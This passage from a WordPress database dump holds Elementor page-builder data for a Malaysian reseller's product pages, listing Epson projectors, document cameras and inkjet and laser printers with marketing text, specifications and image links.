PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7846,3464,'_elementor_version','2.5.14'),(7849,3465,'_wp_page_template','template-fullwidth.php'),(7850,3465,'_elementor_edit_mode','builder'),(7851,3465,'_elementor_template_type','post'),(7852,3465,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" 